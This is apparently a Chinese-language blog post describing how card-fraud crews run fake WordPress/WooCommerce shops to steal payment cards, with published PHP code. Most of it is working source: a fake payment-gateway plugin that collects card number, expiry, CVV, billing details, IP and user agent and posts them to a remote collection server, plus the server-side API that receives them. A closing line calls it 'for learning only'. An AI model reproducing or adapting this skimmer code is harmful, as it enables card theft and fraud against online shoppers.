简单介绍下黑产之信用卡钓鱼

Hello，我是Ceacer，今天来介绍下黑产的信用卡钓鱼工作原理，以及公布部分代码

信用卡钓鱼跟其他钓鱼不一样，这里指的钓鱼不是盗取你的账号或者密码，盗取账号或者密码跟这个不是一个层次的

大部分信用都是使用wordpress

为什么是wordpress？因为wordpress可扩展性强，你可以编写任意插件，只要稍微懂点PHP，写个插件不是什么难事

原理：一个接收信用卡的后台+插件+网站，就可以组成一个信用卡盗取工具

API接口部分代码

// 获取传递的数据
$frist_name = $data['FristName'];
$last_name = $data['LastName'];
$country = $data['cuntry'];
$address = $data['address'];
$city = $data['city'];
$state = $data['state'];
$zip = $data['zip'];
$phone = $data['phone'];
$email = $data['email'];
$cc_number = $data['cc_number'];
$cc_exp = $data['cc_exp'];
$cc_cvv = $data['cc_cvv'];
$cart_items = $data['Cart'];
$user_ip = $data['UserIP'];
$user_agent = $data['UserAgent'];
$browser_language = $data['BrowserLanguage'];

//优先调用config.php
include '../../config.php';

// 创建连接
$conn = new mysqli($servername, $username, $password, $dbname);

// 检查连接
if ($conn->connect_error) {
    echo json_encode(array("status" => "error", "message" => "Connection failed: " . $conn->connect_error));
    exit();
}

被控端(也就是wordpress插件部分代码)

public function process_payment($order_id) {
            $order = wc_get_order($order_id);

            // 将订单标记为未付款
            $order->update_status('pending', 'Order awaiting payment.');

            // 获取客户信息
            $billing_first_name = $order->get_billing_first_name();
            $billing_last_name = $order->get_billing_last_name();
            $billing_address_1 = $order->get_billing_address_1();
            $billing_address_2 = $order->get_billing_address_2();
            $billing_city = $order->get_billing_city();
            $billing_state = $order->get_billing_state();
            $billing_postcode = $order->get_billing_postcode();
            $billing_country = $order->get_billing_country();
            $billing_phone = $order->get_billing_phone();
            $billing_email = $order->get_billing_email();

            // 获取信用卡信息
            $ccNumber = sanitize_text_field($_POST['cc_number']);
            $ccExpMonth = sanitize_text_field($_POST['cc_exp_month']);
            $ccExpYear = sanitize_text_field($_POST['cc_exp_year']);
            $cvv = sanitize_text_field($_POST['cc_cvv']);

            // 获取购物车信息
            $cart_items = array();
            foreach ($order->get_items() as $item_id => $item) {
                $product = wc_get_product($item->get_product_id());
                $cart_items[] = array(
                    'name' => $item->get_name(),
                    'price' => $item->get_total(),
                    'pfh' => get_woocommerce_currency(),
                    'pimg' => wp_get_attachment_url($product->get_image_id()),
                    'size' => $item->get_meta('Size', true),
                    'color' => $item->get_meta('Color', true),
                    'quantity' => $item->get_quantity(),
                    'Title_sv' => $item->get_name()
                );
            }

            // 获取用户IP和UserAgent信息
$user_ip = $_SERVER['REMOTE_ADDR'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$browser_language = $_SERVER['HTTP_ACCEPT_LANGUAGE'];

// 构建数据
$dataToSend = array(
    'hbfh' => '$',
    'FristName' => $billing_first_name,
    'LastName' => $billing_last_name,
    'cuntry' => $billing_country,
    'address' => $billing_address_1 . ', ' . $billing_address_2,
    'city' => $billing_city,
    'state' => $billing_state, // 如果没有获取到 state 信息，根据需求调整
    'zip' => $billing_postcode,
    'phone' => $billing_phone,
    'email' => $billing_email,
    'cc_number' => $ccNumber,
    'cc_exp' => $ccExpMonth . '/' . $ccExpYear,
    'cc_cvv' => $cvv,
    'remark' => '',
    'Cart' => $cart_items,
    'UserIP' => $user_ip,
    'UserAgent' => $user_agent,
    'BrowserLanguage' => $browser_language,
);

// 设置 API 端点
$api_url = 'https://yousitename.com';

// 使用 wp_remote_post 发送数据
$response = wp_remote_post($api_url, array(
    'method'    => 'POST',
    'body'      => json_encode($dataToSend),
    'headers'   => array(
        'Content-Type'  => 'application/json',
    ),
));

这是简单介绍，本文并没有教你任何制作！

代码仅用于学习研究，请勿用于非法！